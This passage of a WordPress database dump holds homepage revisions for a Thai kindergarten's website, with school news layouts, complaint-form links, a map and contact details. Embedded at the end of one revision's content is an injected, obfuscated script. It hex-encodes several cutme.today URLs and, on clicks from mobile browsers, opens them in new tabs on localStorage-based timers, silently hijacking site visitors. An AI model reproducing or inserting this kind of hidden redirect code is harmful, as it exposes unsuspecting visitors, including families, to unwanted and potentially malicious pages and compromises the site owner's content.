e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 10:18:41','2024-08-30 03:18:41','',19,'http://watprato.ssk.in.th/?p=303',0,'revision','',0),
(304,2,'2024-08-30 10:20:44','2024-08-30 03:20:44','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 